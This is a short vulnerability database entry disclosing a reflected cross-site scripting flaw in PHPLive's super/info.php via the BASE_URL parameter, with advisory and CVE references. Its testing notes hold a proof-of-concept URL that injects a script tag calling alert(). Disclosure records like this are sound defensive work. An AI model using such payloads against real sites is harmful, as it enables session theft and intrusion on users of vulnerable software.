PHPLive super/info.php BASE_URL Variable XSS

2007-06-01T00:00:00
ID OSVDB:38382
Type osvdb
Reporter OSVDB
Modified 2007-06-01T00:00:00

Description

Manual Testing Notes

/phplive/super/info.php?BASE_URL=<script>alert(123);</script>

References:

Secunia Advisory ID:25441 Related OSVDB ID: 38381 Related OSVDB ID: 38380 Related OSVDB ID: 38383 Related OSVDB ID: 38379 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0047.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0011.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0005.html FrSIRT Advisory: ADV-2007-2082 CVE-2007-3060 Bugtraq ID: 24276